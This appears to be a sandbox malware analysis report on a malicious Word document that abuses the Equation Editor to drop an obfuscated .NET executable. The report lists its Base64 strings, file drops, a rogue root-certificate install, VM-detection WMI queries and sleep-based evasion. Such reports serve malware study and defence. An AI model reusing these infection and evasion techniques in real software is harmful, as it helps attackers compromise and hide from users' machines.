                      Source: gufoxqa[1].exe.2.dr, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 4.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 4.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                      Data Obfuscation:

                      barindex
                      Binary or sample is protected by dotNetProtectorShow sources
                      Source: gudostrp.exeString found in binary or memory: dotNetProtector
                      Source: gudostrp.exe, 00000004.00000002.462296022.00000000001D2000.00000020.00020000.sdmpString found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: gudostrp.exeString found in binary or memory: dotNetProtector
                      Source: gudostrp.exe, 00000005.00000002.721799916.00000000001D2000.00000020.00020000.sdmpString found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: gufoxqa[1].exe.2.drString found in binary or memory: dotNetProtector
                      Source: gufoxqa[1].exe.2.drString found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_001DEB0F push esp; iretd 4_2_001DEF9A
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_001D67F6 pushfd ; iretd 4_2_001D67FB
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030DE0D pushfd ; iretd 4_2_0030DE1E
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030DB73 push esp; iretd 4_2_0030DB95
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA5275 push ebx; iretd 4_2_01FA5276
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB4FE7 push ebx; ret 4_2_01FB501A
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB504D push ebp; retf 4_2_01FB504E
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB4FBE push ebx; ret 4_2_01FB501A
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FBA412 pushad ; retf 4_2_01FBA41E
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FCB713 pushad ; iretd 4_2_01FCB723
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_02035645 pushad ; ret 4_2_02035655
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D561B push eax; retf 4_2_041D5626
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D7CC7 push ebx; ret 4_2_041D7CCA
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D5901 pushad ; ret 4_2_041D5902
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_001DEB0F push esp; iretd 5_2_001DEF9A
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_001D67F6 pushfd ; iretd 5_2_001D67FB
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_002530B5 push esp; retf 0012h5_2_00253105
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00251B15 push esp; retf 0012h5_2_00251B69
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0055626C pushfd ; retf 0018h5_2_0055626D
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\gudostrp.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 408Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2916Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364Thread sleep time: -3689348814741908s >= -30000sJump to behavior
